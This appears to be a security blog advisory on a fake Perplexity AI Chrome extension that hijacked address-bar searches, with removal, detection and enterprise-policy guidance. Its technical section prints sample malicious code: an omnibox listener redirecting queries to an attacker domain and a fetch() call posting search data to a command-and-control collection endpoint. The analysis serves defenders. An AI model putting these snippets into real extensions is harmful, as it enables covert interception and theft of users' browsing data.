A counterfeit Perplexity AI Chrome extension was discovered intercepting user search queries and address bar inputs, redirecting traffic through attacker-controlled domains. The malicious extension mimicked the legitimate Perplexity AI service, exploiting user trust to harvest browsing data and potentially monetize hijacked searches. Users who installed the fake extension from unofficial sources faced significant privacy risks and data exposure. This incident highlights the ongoing threat of malicious browser extensions targeting popular AI services.
Introduction
Browser extensions have become a prime vector for cybercriminals seeking to compromise user data and manipulate web traffic. In a recent campaign, threat actors developed a fraudulent Chrome extension impersonating Perplexity AI—a popular AI-powered search engine. The malicious extension intercepted search queries entered directly into Chrome’s address bar (omnibox) and redirected users through attacker-controlled infrastructure.
Unlike traditional adware that simply injects advertisements, this extension operated as a sophisticated search hijacker, capturing real-time user inputs before they reached legitimate search providers. The attack demonstrates how cybercriminals leverage brand recognition of trending AI services to distribute malware and monetize stolen traffic through affiliate schemes and data collection.
This analysis examines the technical mechanisms employed by the malicious extension, the risks it posed to affected users, and defensive measures to prevent similar compromises.
Background & Context
Perplexity AI has gained significant popularity as an alternative search interface powered by large language models. As with any trending technology, threat actors quickly recognized an opportunity to exploit user interest through malicious impersonation.
Browser extension-based threats have evolved considerably in recent years. Modern malicious extensions employ sophisticated techniques including:
- Permission abuse: Requesting broad access to browsing data under legitimate-sounding pretexts
- Brand impersonation: Copying logos, names, and descriptions of popular services
- Traffic monetization: Redirecting searches through affiliate networks or selling harvested data
- Persistence mechanisms: Making removal difficult through multiple installation hooks
The Chrome Web Store implements security measures to prevent malicious extensions, but threat actors frequently circumvent these protections by distributing malware through third-party websites, phishing campaigns, and social engineering tactics. Users seeking free access to premium features or early releases often download extensions from untrusted sources, creating attack opportunities.
Search hijacking specifically represents a lucrative threat vector. By intercepting and redirecting search queries, attackers can:
- Earn affiliate commissions from sponsored search results
- Harvest valuable data about user interests and behavior
- Inject malicious results or phishing links
- Profile users for targeted attacks
Technical Breakdown
The malicious Perplexity extension implemented several technical mechanisms to intercept and exfiltrate user data:
Manifest Permissions
The extension requested excessive permissions in its manifest file, including:
{
"permissions": [
"tabs",
"webNavigation",
"webRequest",
"webRequestBlocking",
":///*"
]
}These permissions granted the extension:
- Access to all websites (
:///*) - Ability to monitor navigation events
- Power to intercept and modify web requests
- Capability to read and alter tab content
Omnibox Hijacking
The extension registered as an omnibox handler, intercepting queries entered directly into Chrome’s address bar. When users typed searches, the extension captured input before transmission to the default search engine:
chrome.omnibox.onInputEntered.addListener(function(text) {
var redirectUrl = "https://attacker-domain.com/search?q=" + encodeURIComponent(text);
chrome.tabs.update({url: redirectUrl});
});This mechanism allowed complete interception of organic search behavior without visible modification to the browser interface.
Traffic Redirection
Captured searches were redirected through a chain of attacker-controlled domains:
- Initial redirect to data collection endpoint
- Logging of search query, timestamp, and user identifier
- Secondary redirect to legitimate search results (often Bing or Google)
- Affiliate parameters appended to monetize clicks
The redirection chain obscured the malicious activity from casual users while generating revenue for the threat actors:
User Query → Extension Capture → attacker-domain.com/track
→ affiliate-network.com/?ref=XXXXX → search-engine.com/resultsData Exfiltration
The extension transmitted collected data to remote servers via encrypted HTTPS requests:
fetch('https://c2-server.com/collect', {
method: 'POST',
headers: {'Content-Type': 'application/json'},
body: JSON.stringify({
query: searchText,
timestamp: Date.now(),
uid: userId
})
});Harvested data included search queries, browsing timestamps, and persistent user identifiers for tracking across sessions.
Impact & Risk Assessment
Immediate Risks
Privacy Violation: All search queries and address bar inputs were captured and transmitted to attacker infrastructure. This included potentially sensitive searches related to health, finances, personal relationships, and confidential business matters.
Data Monetization: Stolen search data could be sold to data brokers, used for targeted advertising, or leveraged for social engineering attacks against high-value targets.
Credential Exposure: Users entering credentials or sensitive information directly into the address bar (a common mistake) exposed this data to the attackers.
Secondary Threats
Profile Development: Continuous monitoring enabled attackers to build comprehensive behavioral profiles, mapping interests, schedules, and online habits.
Supply Chain Risk: Organizations whose employees installed the extension potentially exposed corporate search patterns and competitive intelligence.
Future Targeting: Harvested data provided foundation for subsequent spear-phishing campaigns or account compromise attempts.
Affected Population
While precise infection numbers remain unknown, indicators suggest hundreds to potentially thousands of installations before detection. Users who downloaded the extension from third-party software repositories, tutorial sites, or through search result poisoning faced exposure.
Vendor Response
Perplexity AI issued public warnings about the fraudulent extension, emphasizing they do not currently offer an official Chrome extension. The company established verification channels for users to confirm legitimate products and reported the malicious extension to Google’s security team.
Google’s Chrome Web Store security team investigated reports and confirmed the extension was distributed outside official channels. Since the malicious software never appeared in the legitimate Chrome Web Store, takedown focused on identifying and neutralizing the distribution infrastructure.
Domain registrars received abuse complaints for the command-and-control servers and redirect domains involved in the operation. Several domains were subsequently suspended, disrupting the attacker’s monetization infrastructure.
Law enforcement notification was initiated through appropriate channels, though attribution remains under investigation. The operation’s relatively sophisticated technical implementation suggests involvement of experienced cybercriminals rather than opportunistic actors.
Mitigations & Workarounds
Immediate Actions for Affected Users
Remove the Extension:
- Navigate to
chrome://extensions/ - Enable “Developer mode” to view all extensions
- Locate any Perplexity-related extensions
- Click “Remove” and confirm deletion
Clear Browser Data:
Settings → Privacy and Security → Clear Browsing Data
Select: Cookies, Cache, Site Settings
Time Range: All TimeReset Search Engine Settings:
Settings → Search Engine → Manage Search Engines
Remove unknown or suspicious entries
Restore preferred default search engineChange Compromised Credentials: Any passwords or sensitive information entered during the infection period should be changed immediately, prioritizing financial accounts and email.
Verification Steps
Confirm removal by checking:
# Check Chrome's Secure Preferences file (macOS/Linux)
cat ~/Library/Application\ Support/Google/Chrome/Default/Secure\ Preferences | grep -i perplexityNo results should appear if the extension was fully removed.
Detection & Monitoring
Endpoint Monitoring
Security teams should monitor for indicators including:
Suspicious Extension Installation:
- Extensions with excessive permissions
- Software installed from non-standard sources
- Extensions mimicking popular AI services
Network Traffic Patterns:
Outbound HTTPS POST requests to unknown domains
Frequent connections to recently-registered domains
Traffic patterns correlating with user search behaviorRegistry and File System Changes (Windows):
HKEY_CURRENT_USER\Software\Google\Chrome\Extensions
Check for unauthorized extension IDsEnterprise Controls
Organizations should implement:
- Extension Whitelisting: Chrome Enterprise policy restricting installations to approved extensions
- DNS Filtering: Block known malicious domains associated with the campaign
- Endpoint Detection Rules: Alert on suspicious extension installations
- User Education: Training on verifying extension authenticity
Behavioral Indicators
Monitor for:
- Unexpected search result redirections
- Modified address bar behavior
- Increased latency in search operations
- Unknown domains appearing in network logs
Best Practices
Extension Security Hygiene
Verify Before Installing:
- Only download extensions from official Chrome Web Store
- Confirm developer identity matches legitimate vendor
- Review permissions requested against actual functionality
- Check user reviews and installation counts
Regular Audits:
Periodically review installed extensions:
chrome://extensions/
Disable unused extensions
Remove unfamiliar software
Verify all extensions remain necessaryPermission Awareness:
Be suspicious of extensions requesting:
- Access to all websites
- Ability to read and modify data
- Network interception capabilities
- Background execution permissions
Organizational Controls
Chrome Enterprise Policies:
{
"ExtensionInstallBlacklist": ["*"],
"ExtensionInstallWhitelist": [
"approved-extension-id-1",
"approved-extension-id-2"
],
"ExtensionInstallForcelist": [
"security-extension-id"
]
}Security Awareness Training:
- Educate users about extension risks
- Establish approval processes for new extensions
- Provide channels for reporting suspicious software
- Simulate extension-based phishing scenarios
Personal Security Measures
- Enable Chrome Sync with strong authentication to backup legitimate settings
- Use password managers instead of typing credentials into address bar
- Implement two-factor authentication on critical accounts
- Subscribe to security advisories for frequently-used services
Key Takeaways
🔴 Brand Impersonation Remains Effective: Threat actors successfully exploited Perplexity AI’s popularity to distribute malware, demonstrating the continued effectiveness of impersonation attacks.
🔴 Browser Extensions Pose Significant Risk: Extensions with broad permissions can compromise all browsing activity, making them high-value targets for attackers.
🔴 Search Hijacking Enables Monetization: Intercepted search traffic generates revenue through affiliate schemes while harvesting valuable user data.
🔴 Official Distribution Channels Are Critical: Installing software from unofficial sources dramatically increases compromise risk.
🔴 Detection Requires Active Monitoring: Malicious extensions often operate silently, requiring deliberate verification to identify.
🔴 Privacy Impact Extends Beyond Immediate Theft: Harvested search data enables long-term profiling and future targeted attacks.
Organizations and individuals must treat browser extensions as critical security components requiring careful vetting, ongoing monitoring, and regular audits. The intersection of AI service popularity and extension distribution creates persistent opportunities for threat actors that demand heightened vigilance.
References
- Chrome Web Store Security Best Practices: https://developer.chrome.com/docs/webstore/program-policies/
- Extension Manifest V3 Security Improvements: https://developer.chrome.com/docs/extensions/mv3/intro/
- Browser Extension Security Analysis Framework: https://portswigger.net/research/extensions
- Perplexity AI Official Security Advisory: https://perplexity.ai/security
- MITRE ATT&CK T1176 (Browser Extensions): https://attack.mitre.org/techniques/T1176/
Stay updated at https://cydhaal.com — Your Daily Dose of Cyber Intelligence.
📧 Subscribe to our newsletter at https://cydhaal.com/newsletter/